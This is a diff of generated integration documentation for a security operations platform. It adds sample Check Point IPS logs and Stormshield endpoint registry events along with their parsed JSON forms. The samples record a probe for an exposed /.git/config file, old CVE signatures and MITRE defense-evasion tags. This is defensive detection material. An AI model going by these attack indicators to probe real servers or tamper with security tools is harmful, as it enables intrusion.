demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "CEF_proxy_src.json" + + ```json + + { + "message": "0|Check Point|SmartDefense|Check Point|IPS|Web Server Exposed Git Repository Information Disclosure|Very-High|act=Detect cp_severity=Very-High cnt=1 cs1Label=Threat Prevention Rule Name cs2Label=Protection ID cs2=asm_dynamic_prop_GIT_EXPOSED cs3Label=Protection Type cs3=IPS cs4Label=Protection Name cs4=Web Server Exposed Git Repository Information Disclosure cs4Label=Threat Prevention Rule ID cs4={115C1043-DF8A-48D4-96CB-0200C1F1499A} deviceDirection=1 flexNumber1Label=Confidence flexNumber1=5 flexNumber2Label=Performance Impact flexNumber2=3 flexString2Label=Attack Information flexString2=Web Server Exposed Git Repository Information Disclosure in=52 msg=Web Server Enforcement Violation out=0 request=http://9.10.11.12/.git/config requestMethod=GET rt=1722861810000 spt=51451 dpt=80 cs4Label=Threat Prevention Rule ID cs4={115C1043-DF8A-48D4-96CB-0200C1F1499A} cs4={6E7AA7B4-FD2A-40A3-ACDE-AC1182F1120F} cs1Label=Threat Prevention Rule Name cs1=Antibot + TE EAP layer_name=IPS layer_uuid={1DA55D35-9A2B-4141-A512-150DC635378B} layer_uuid={368D4C86-B4FD-4EF9-9AED-E58C4C0DEE7F} smartdefense_profile=EAP_Prevent smartdefense_profile=Profil_EAP_Anti-Bot_TE ifname=bond1.103 loguid={0x611c9f51,0x8c73c182,0xe99e964e,0x2addea20} origin=192.168.203.80 originsicname=CN\\=MyGW,O\\=MyDomain_Server.checkpoint.com.s6t98x sequencenum=85 version=5 description_url=GIT_EXPOSED_help.html dst=1.2.3.4 lastupdatetime=1722861871 log_id=2 policy=2016-12_Prolix_Migration-FW policy_time=1722591913 product=SmartDefense proto=6 proxy_src_ip=5.6.7.8 reject_id_kid=66b0c8f2-2-a5f697e5-ce3758d7 rule_uid=e70129a9-2a18-4075-8042-b85f0b601ca4 ser_agent_kid=Safari 4.0 session_id={0x66b06cef,0x11,0x9b1c4c53,0xdf840ae7} smartdefense_profile=EAP_Prevent src=5.6.7.8 tags=Vendor_Git Product_Web_Servers Threat_Year_2015 Threat_Prevalence_True Protection_Type_Vulnerability Product_Prevalence_Common Tuning_Non_Configurable Protocol_HTTP Direction_SERVER", + "event": { + "code": "IPS", + "message": "Web Server Enforcement Violation", + "outcome": "success" + }, + "action": { + "name": "detect", + "outcome": "success", + "outcome_reason": "Web Server Enforcement Violation", + "properties": { + "loguid": "{0x611c9f51,0x8c73c182,0xe99e964e,0x2addea20}", + "observer_type": "SmartDefense", + "origin": "192.168.203.80", + "originsicname": "CN=MyGW,O=MyDomain_Server.checkpoint.com.s6t98x", + "product": "SmartDefense" + }, + "target": "network-traffic" + }, + "destination": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 80 + }, + "http": { + "request": { + "method": "GET" + } + }, + "log": { + "level": "Very-High" + }, + "network": { + "direction": "outbound", + "forwarded_ip": "5.6.7.8", + "transport": "tcp" + }, + "observer": { + "ingress": { + "interface": { + "name": "bond1.103" + } + } + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "rule": { + "uuid": "e70129a9-2a18-4075-8042-b85f0b601ca4", + "version": "5" + }, + "source": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 51451 + }, + "url": { + "domain": "9.10.11.12", + "full": "http://9.10.11.12/.git/config", + "original": "http://9.10.11.12/.git/config", + "path": "/.git/config", + "port": 80, + "scheme": "http" + } + } + + ``` + + === "CEF_reject.json" ```json @@ -725,6 +802,73 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "CEF_syslog.json" + + ```json + + { + "message": "0|Check Point|SmartDefense|Check Point|IPS|Syslog Message Length Enforcement|Medium|act=Detect cp_severity=Medium cnt=53 cs1Label=Threat Prevention Rule Name cs2Label=Protection ID cs2=02syslg_max_msg_len_tab cs3Label=Protection Type cs3=IPS cs4Label=Protection Name cs4=Syslog Message Length Enforcement cs4Label=Threat Prevention Rule ID cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} deviceDirection=1 flexNumber1Label=Confidence flexNumber1=1 flexNumber2Label=Performance Impact flexNumber2=2 flexString2Label=Attack Information flexString2=phpFileManager cmd Parameter Command Execution in=0 msg=Syslog Protocol Violation out=0 rt=1705349059000 spt=57789 dpt=514 Signature=CVE-1999-0063, CVE-1999-0381 cs4Label=Threat Prevention Rule ID cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs1Label=Threat Prevention Rule Name layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy ifname=eth5.996 loguid={0xc4f7efea,0x4a15abc5,0x796000a8,0x18edf12d} origin=3.4.5.6 originsicname=CN\\=DN-EXAMPLE,O\\=alfi.defo.ccse.nl sequencenum=12 version=5 capture_uuid={0x65a58fcb,0x1,0x4d1f8365,0xc5a8726d} description_url=02syslg_max_msg_len_tab_help.html dst=5.6.7.8 lastupdatetime=1705352059 log_id=2 policy=dn policy_time=1705348793 product=SmartDefense proto=17 rule_uid=b16110f0-fc9f-43b1-9f87-a8ad3f995237 session_id={0x65a58fc3,0x3,0x4d1f8365,0xc5a8726d} smartdefense_profile=XXXX_IPS_policy src=1.2.3.4", + "event": { + "code": "IPS", + "message": "Syslog Protocol Violation", + "outcome": "success" + }, + "action": { + "name": "detect", + "outcome": "success", + "outcome_reason": "Syslog Protocol Violation", + "properties": { + "loguid": "{0xc4f7efea,0x4a15abc5,0x796000a8,0x18edf12d}", + "observer_type": "SmartDefense", + "origin": "3.4.5.6", + "originsicname": "CN=DN-EXAMPLE,O=alfi.defo.ccse.nl", + "product": "SmartDefense", + "signature": [ + "CVE-1999-0063", + "CVE-1999-0381" + ] + }, + "target": "network-traffic" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 514 + }, + "log": { + "level": "Medium" + }, + "network": { + "direction": "outbound", + "transport": "udp" + }, + "observer": { + "ingress": { + "interface": { + "name": "eth5.996" + } + } + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "rule": { + "uuid": "b16110f0-fc9f-43b1-9f87-a8ad3f995237", + "version": "5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 57789 + } + } + + ``` + + === "CEF_tcp_accept.json" ```json @@ -912,19 +1056,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "ip": "1.1.1.1" }, "host": { - "hostname": "2.2.2.2", "name": "2.2.2.2" }, - "log": { - "hostname": "2.2.2.2" - }, "network": { "transport": "icmp" }, "related": { - "hosts": [ - "2.2.2.2" - ], "ip": [ "1.1.1.1", "3.3.3.3" @@ -959,19 +1096,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "port": 443 }, "host": { - "hostname": "FOOBAR-HOST-01", "name": "FOOBAR-HOST-01" }, - "log": { - "hostname": "FOOBAR-HOST-01" - }, "network": { "transport": "tcp" }, "related": { - "hosts": [ - "FOOBAR-HOST-01" - ], "ip": [ "1.1.1.1", "2.2.2.2" @@ -1007,19 +1137,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "port": 58339 }, "host": { - "hostname": "FOOBAR-HOST-01", "name": "FOOBAR-HOST-01" }, - "log": { - "hostname": "FOOBAR-HOST-01" - }, "network": { "transport": "tcp" }, "related": { - "hosts": [ - "FOOBAR-HOST-01" - ], "ip": [ "1.1.1.1", "2.2.2.2" @@ -1344,6 +1467,7 @@ The following table lists the fields that are extracted, normalized under the EC |`action.properties.product` | `keyword` | | |`action.properties.reject_category` | `keyword` | | |`action.properties.rule_name` | `keyword` | | +|`action.properties.signature` | `array` | | |`action.properties.source_key_id` | `keyword` | | |`action.properties.subproduct` | `keyword` | | |`action.properties.vpn_feature_name` | `keyword` | | @@ -1358,10 +1482,11 @@ The following table lists the fields that are extracted, normalized under the EC |`destination.size_in_char` | `number` | | |`destination.user.name` | `keyword` | Short name or login of the user. | |`event.code` | `keyword` | Identification code for this event. | -|`host.hostname` | `keyword` | Hostname of the host. | |`host.name` | `keyword` | Name of the host. | |`http.request.method` | `keyword` | HTTP request method. | +|`log.level` | `keyword` | Log level of the log event. | |`network.direction` | `keyword` | Direction of the network traffic. | +|`network.forwarded_ip` | `ip` | Host IP address when the source IP address is the proxy. | |`network.protocol` | `keyword` | Application protocol name. | |`network.transport` | `keyword` | Protocol Name corresponding to the field `iana_number`. | |`observer.egress.zone` | `keyword` | Observer Egress zone | diff --git a/_shared_content/operations_center/integrations/generated/f0a10c21-37d1-419f-8671-77903dc8de69_sample.md b/_shared_content/operations_center/integrations/generated/f0a10c21-37d1-419f-8671-77903dc8de69_sample.md index 51fb287215..a75f25ed98 100644 --- a/_shared_content/operations_center/integrations/generated/f0a10c21-37d1-419f-8671-77903dc8de69_sample.md +++ b/_shared_content/operations_center/integrations/generated/f0a10c21-37d1-419f-8671-77903dc8de69_sample.md @@ -106,6 +106,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "CEF_proxy_src" + + ``` + 0|Check Point|SmartDefense|Check Point|IPS|Web Server Exposed Git Repository Information Disclosure|Very-High|act=Detect cp_severity=Very-High cnt=1 cs1Label=Threat Prevention Rule Name cs2Label=Protection ID cs2=asm_dynamic_prop_GIT_EXPOSED cs3Label=Protection Type cs3=IPS cs4Label=Protection Name cs4=Web Server Exposed Git Repository Information Disclosure cs4Label=Threat Prevention Rule ID cs4={115C1043-DF8A-48D4-96CB-0200C1F1499A} deviceDirection=1 flexNumber1Label=Confidence flexNumber1=5 flexNumber2Label=Performance Impact flexNumber2=3 flexString2Label=Attack Information flexString2=Web Server Exposed Git Repository Information Disclosure in=52 msg=Web Server Enforcement Violation out=0 request=http://9.10.11.12/.git/config requestMethod=GET rt=1722861810000 spt=51451 dpt=80 cs4Label=Threat Prevention Rule ID cs4={115C1043-DF8A-48D4-96CB-0200C1F1499A} cs4={6E7AA7B4-FD2A-40A3-ACDE-AC1182F1120F} cs1Label=Threat Prevention Rule Name cs1=Antibot + TE EAP layer_name=IPS layer_uuid={1DA55D35-9A2B-4141-A512-150DC635378B} layer_uuid={368D4C86-B4FD-4EF9-9AED-E58C4C0DEE7F} smartdefense_profile=EAP_Prevent smartdefense_profile=Profil_EAP_Anti-Bot_TE ifname=bond1.103 loguid={0x611c9f51,0x8c73c182,0xe99e964e,0x2addea20} origin=192.168.203.80 originsicname=CN\=MyGW,O\=MyDomain_Server.checkpoint.com.s6t98x sequencenum=85 version=5 description_url=GIT_EXPOSED_help.html dst=1.2.3.4 lastupdatetime=1722861871 log_id=2 policy=2016-12_Prolix_Migration-FW policy_time=1722591913 product=SmartDefense proto=6 proxy_src_ip=5.6.7.8 reject_id_kid=66b0c8f2-2-a5f697e5-ce3758d7 rule_uid=e70129a9-2a18-4075-8042-b85f0b601ca4 ser_agent_kid=Safari 4.0 session_id={0x66b06cef,0x11,0x9b1c4c53,0xdf840ae7} smartdefense_profile=EAP_Prevent src=5.6.7.8 tags=Vendor_Git Product_Web_Servers Threat_Year_2015 Threat_Prevalence_True Protection_Type_Vulnerability Product_Prevalence_Common Tuning_Non_Configurable Protocol_HTTP Direction_SERVER + ``` + + + === "CEF_reject" ``` @@ -114,6 +122,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "CEF_syslog" + + ``` + 0|Check Point|SmartDefense|Check Point|IPS|Syslog Message Length Enforcement|Medium|act=Detect cp_severity=Medium cnt=53 cs1Label=Threat Prevention Rule Name cs2Label=Protection ID cs2=02syslg_max_msg_len_tab cs3Label=Protection Type cs3=IPS cs4Label=Protection Name cs4=Syslog Message Length Enforcement cs4Label=Threat Prevention Rule ID cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} deviceDirection=1 flexNumber1Label=Confidence flexNumber1=1 flexNumber2Label=Performance Impact flexNumber2=2 flexString2Label=Attack Information flexString2=phpFileManager cmd Parameter Command Execution in=0 msg=Syslog Protocol Violation out=0 rt=1705349059000 spt=57789 dpt=514 Signature=CVE-1999-0063, CVE-1999-0381 cs4Label=Threat Prevention Rule ID cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs1Label=Threat Prevention Rule Name layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy smartdefense_profile=XXXX_IPS_policy ifname=eth5.996 loguid={0xc4f7efea,0x4a15abc5,0x796000a8,0x18edf12d} origin=3.4.5.6 originsicname=CN\=DN-EXAMPLE,O\=alfi.defo.ccse.nl sequencenum=12 version=5 capture_uuid={0x65a58fcb,0x1,0x4d1f8365,0xc5a8726d} description_url=02syslg_max_msg_len_tab_help.html dst=5.6.7.8 lastupdatetime=1705352059 log_id=2 policy=dn policy_time=1705348793 product=SmartDefense proto=17 rule_uid=b16110f0-fc9f-43b1-9f87-a8ad3f995237 session_id={0x65a58fc3,0x3,0x4d1f8365,0xc5a8726d} smartdefense_profile=XXXX_IPS_policy src=1.2.3.4 + ``` + + + === "CEF_tcp_accept" ``` diff --git a/_shared_content/operations_center/integrations/generated/f0f95532-9928-4cde-a399-ddd992d48472.md b/_shared_content/operations_center/integrations/generated/f0f95532-9928-4cde-a399-ddd992d48472.md index 32d9a53c1f..1c2b9d8e7b 100644 --- a/_shared_content/operations_center/integrations/generated/f0f95532-9928-4cde-a399-ddd992d48472.md +++ b/_shared_content/operations_center/integrations/generated/f0f95532-9928-4cde-a399-ddd992d48472.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_transaction_blocked.json" diff --git a/_shared_content/operations_center/integrations/generated/f570dd30-854b-4a22-9c2d-e2cfa46bf0e5.md b/_shared_content/operations_center/integrations/generated/f570dd30-854b-4a22-9c2d-e2cfa46bf0e5.md index d7cf4e845e..f9f280d3a9 100644 --- a/_shared_content/operations_center/integrations/generated/f570dd30-854b-4a22-9c2d-e2cfa46bf0e5.md +++ b/_shared_content/operations_center/integrations/generated/f570dd30-854b-4a22-9c2d-e2cfa46bf0e5.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_blocked_file.json" diff --git a/_shared_content/operations_center/integrations/generated/f5e6cf5e-bd9f-4caf-9098-fe4a9e0aeaa0.md b/_shared_content/operations_center/integrations/generated/f5e6cf5e-bd9f-4caf-9098-fe4a9e0aeaa0.md index e2a54a30b7..f528c3541e 100644 --- a/_shared_content/operations_center/integrations/generated/f5e6cf5e-bd9f-4caf-9098-fe4a9e0aeaa0.md +++ b/_shared_content/operations_center/integrations/generated/f5e6cf5e-bd9f-4caf-9098-fe4a9e0aeaa0.md @@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_type_1000.json" @@ -466,6 +466,103 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_type_104_2.json" + + ```json + + { + "message": "{\"Version\": 1, \"Type\": 104, \"TypeComputedMap\": \"RegistryKeyRead\", \"Severity\": 2, \"ServerReserved\": 0, \"Attributes\": 2, \"AttributesComputedBitMap\": [\"Protection\"], \"EventGuid\": \"{4C8EFA24-0021-49CA-B9F7-CF5A7BF57173}\", \"GenerateIncident\": true, \"Timestamp\": \"2024-07-09T12:08:54.9660242+02:00\", \"TimestampRaw\": 133649933349660242, \"SpecificData\": {\"SourceProcess\": {\"PID\": 3948, \"ProcessGuid\": \"{93158E40-E93F-46CE-BCE0-3FC359B07B75}\", \"ProcessImageName\": \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\4.18.24050.7-0\\\\MsMpEng.exe\", \"VolumeZone\": 1, \"VolumeZoneComputedBitMap\": [\"Operating system\"], \"ProcessCommandLine\": \"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\4.18.24050.7-0\\\\MsMpEng.exe\\\"\", \"User\": \"S-1-5-21-2222222-33333333-44444444-555\", \"UserNameLookup\": \"JOHNDOE\", \"UserDomainLookup\": \"TEST\", \"IntegrityLevel\": \"S-1-16-16384\", \"IntegrityLevelNameLookup\": \"Niveau obligatoire syst\\u00e8me\", \"IntegrityLevelDomainLookup\": \"\\u00c9tiquette obligatoire\", \"SessionID\": 0, \"HashMd5\": \"4A4D6E95B693256BCD6E90FDC077194A\", \"HashSha1\": \"2E52FBE255C0CB6C6B27EEE8C28ACAFAA42DB60E\", \"HashSha256\": \"08D69BDE42AEEA0F0ECBF16A84BF74AF47C0EA6C0ADA6DDBD40CDC7F5C2930ED\", \"IsProtectedOrCritical\": true, \"CertificateSignatureState\": 1, \"CertificateSignatureStateComputedMap\": \"SignatureStateTrusted\", \"Certificates\": [{\"Algorithm\": \"SHA256\", \"IssuerCN\": \"Microsoft Windows Production PCA 2011\", \"SubjectCN\": \"Microsoft Windows Publisher\", \"SigningTime\": \"2024-05-11T03:15:15.5120000+02:00\", \"ValidityStart\": \"2024-02-08T21:22:45.0000000+02:00\", \"ValidityEnd\": \"2025-02-07T21:22:45.0000000+02:00\"}], \"ProcessStartTime\": \"2024-07-09T10:03:54.4154623+02:00\", \"ProcessStartTimeRaw\": 133649858344154623}, \"Action\": {\"PolicyGuid\": \"{2042076D-A879-4913-A2C7-E94A9ECE8D79}\", \"PolicyVersion\": 14, \"RuleGuid\": \"{F676C8C4-D8FD-4ED2-89FB-C949EA33951C}\", \"BaseRuleGuid\": \"{508448D3-1872-416D-99D9-A3F64AE24C48}\", \"IdentifierGuid\": \"{6F1EAB4E-60E5-4DA2-8509-768988375E47}\", \"Blocked\": false, \"RequestMoveToQuarantine\": false, \"UserDecision\": false, \"SourceProcessKilled\": false, \"RuleTags\": [\"T1562.001\"]}, \"Path\": \"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\TemporaryPaths\", \"InformationClass\": 4, \"InformationClassComputedMap\": \"KeyCachedInformation\"}, \"AdditionalData\": {\"AgentAddresses\": [\"1.2.3.4\"], \"AgentGroupGuid\": \"{1B24AC36-5218-4F44-A374-80D86475E325}\", \"AgentGroupName\": \"Demo\", \"AgentGuid\": \"{6CA7D1BE-7359-426D-B5B1-D9E742DF69A6}\", \"AgentName\": \"WIN10-A\", \"AttackCVEId\": null, \"AttackMitreTacticId\": [\"TA0005\"], \"AttackMitreTacticName\": [\"Defense Evasion\"], \"AttackMitreTechnicId\": [\"T1562\", \"T1562.001\"], \"AttackMitreTechnicName\": [\"Impair Defenses\", \"Disable or Modify Tools\"], \"AttackSESId\": null, \"AttackTriggerCondition\": \"An untrusted process attempts to add bypass into Windows Defender.\", \"CategoryName\": \"Registry\", \"IncidentGuid\": \"{CE926A32-4461-47C0-BDE8-43C1493E7DF0}\", \"Message\": \"The 'MsMpEng.exe' process read the registry key 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\TemporaryPaths'\", \"PolicyName\": \"Demo - Protect policy\", \"SeverityName\": \"Critical\"}}", + "event": { + "category": [ + "registry" + ], + "code": "RegistryKeyRead", + "reason": "The 'MsMpEng.exe' process read the registry key 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\TemporaryPaths'", + "severity": 2, + "type": [ + "access" + ] + }, + "@timestamp": "2024-07-09T10:08:54.966024Z", + "process": { + "command_line": "\"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.24050.7-0\\MsMpEng.exe\"", + "executable": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.24050.7-0\\MsMpEng.exe", + "hash": { + "md5": "4A4D6E95B693256BCD6E90FDC077194A", + "sha1": "2E52FBE255C0CB6C6B27EEE8C28ACAFAA42DB60E", + "sha256": "08D69BDE42AEEA0F0ECBF16A84BF74AF47C0EA6C0ADA6DDBD40CDC7F5C2930ED" + }, + "name": "MsMpEng.exe", + "pid": 3948, + "start": "2024-07-09T08:03:54.415462Z", + "user": { + "id": "S-1-5-21-2222222-33333333-44444444-555", + "name": "JOHNDOE" + } + }, + "registry": { + "hive": "HKEY_LOCAL_MACHINE", + "key": "SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\TemporaryPaths", + "path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\TemporaryPaths" + }, + "related": { + "hash": [ + "08D69BDE42AEEA0F0ECBF16A84BF74AF47C0EA6C0ADA6DDBD40CDC7F5C2930ED", + "2E52FBE255C0CB6C6B27EEE8C28ACAFAA42DB60E", + "4A4D6E95B693256BCD6E90FDC077194A" + ] + }, + "rule": { + "ruleset": "Demo - Protect policy", + "uuid": "F676C8C4-D8FD-4ED2-89FB-C949EA33951C" + }, + "stormshield": { + "ses": { + "action": { + "blocked": false, + "user_decision": false + }, + "categoryname": "Registry", + "incident": { + "id": "{CE926A32-4461-47C0-BDE8-43C1493E7DF0}" + }, + "level": "Critical", + "process": { + "user": { + "domain": "TEST" + } + }, + "source_process": { + "killed": false + }, + "type": "104" + } + }, + "threat": { + "tactic": { + "id": [ + "TA0005" + ], + "name": [ + "Defense Evasion" + ] + }, + "technique": { + "id": [ + "T1562", + "T1562.001" + ], + "name": [ + "Disable or Modify Tools", + "Impair Defenses" + ] + } + } + } + + ``` + + === "test_type_109.json" ```json @@ -729,9 +826,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "registry": { + "data": { + "type": "REG_SZ" + }, "hive": "HKEY_CURRENT_USER", "key": "SOFTWARE\\TEST_ADE", - "path": "HKEY_CURRENT_USER\\SOFTWARE\\TEST_ADE" + "path": "HKEY_CURRENT_USER\\SOFTWARE\\TEST_ADE", + "value": "Valeur_String" }, "related": { "hash": [ @@ -765,6 +866,99 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_type_113_1.json" + + ```json + + { + "message": "{\"Version\":1,\"Type\":113,\"TypeComputedMap\":\"RegistryValueCreate\",\"Severity\":5,\"ServerReserved\":9,\"Attributes\":8,\"AttributesComputedBitMap\":[\"Audit\"],\"EventGuid\":\"{E8B35E85-838F-44E5-B7AB-7635E9C81ECB}\",\"GenerateIncident\":false,\"Timestamp\":\"2024-03-22T12:39:27.6422102+01:00\",\"TimestampRaw\":133555811676422102,\"SpecificData\":{\"SourceProcess\":{\"PID\":1196,\"ProcessGuid\":\"{B0E2F52D-8C18-4DF8-8E73-470BB4E5D373}\",\"ProcessImageName\":\"C:\\\\Windows\\\\regedit.exe\",\"VolumeZone\":1,\"VolumeZoneComputedBitMap\":[\"Operatingsystem\"],\"ProcessCommandLine\":\"\\\"C:\\\\WINDOWS\\\\regedit.exe\\\"\",\"User\":\"S-1-5-21-2222222-33333333-44444444-555\",\"UserNameLookup\":\"JOHNDOE\",\"UserDomainLookup\":\"TEST\",\"IntegrityLevel\":\"S-1-16-8192\",\"IntegrityLevelNameLookup\":\"MediumMandatoryLevel\",\"IntegrityLevelDomainLookup\":\"MandatoryLabel\",\"SessionID\":2,\"HashMd5\":\"999A30979F6195BF562068639FFC4426\",\"HashSha1\":\"D4F2663AABC03478975382B3C69F24B3C6BD2AA9\",\"HashSha256\":\"92F24FED2BA2927173AAD58981F6E0643C6B89815B117E8A7C4A0988AC918170\",\"IsProtectedOrCritical\":false,\"CertificateSignatureState\":1,\"CertificateSignatureStateComputedMap\":\"SignatureStateTrusted\",\"Certificates\":[{\"Algorithm\":\"SHA256\",\"IssuerCN\":\"MicrosoftWindowsProductionPCA2011\",\"SubjectCN\":\"MicrosoftWindows\",\"SigningTime\":\"2023-01-18T02:58:33.2360000+01:00\",\"ValidityStart\":\"2022-05-05T20:23:14.0000000+01:00\",\"ValidityEnd\":\"2023-05-04T20:23:14.0000000+01:00\"}],\"ProcessStartTime\":\"2023-03-06T16:04:21.8793902+01:00\",\"ProcessStartTimeRaw\":133225886618793902},\"Action\":{\"PolicyGuid\":\"{BF0D5FEE-FF2A-4E6B-97DA-A1FC246FE845}\",\"PolicyVersion\":4,\"RuleGuid\":\"{4CEEDD7A-875D-4C7E-9ABD-A710BD3DD0C0}\",\"BaseRuleGuid\":\"{4CEEDD7A-875D-4C7E-9ABD-A710BD3DD0BF}\",\"IdentifierGuid\":\"{5C079068-7641-4C9A-8600-BBDC93FBBCDD}\",\"Blocked\":false,\"UserDecision\":false,\"SourceProcessKilled\":false},\"Path\":\"HKEY_LOCAL_MACHINE\\\\BCD00000000\\\\Objects\\\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\\\Elements\\\\25000004\",\"ValueName\":\"Element\",\"ValueDataType\":3,\"ValueDataTypeComputedMap\":\"REG_BINARY\",\"ValueData\":[0,0,0,0,0,0,0,0]},\"AdditionalData\":{\"AgentAddresses\":[],\"AgentGroupGuid\":\"{61B578F4-289D-4B97-A331-DDDCB80C6427}\",\"AgentGroupName\":\"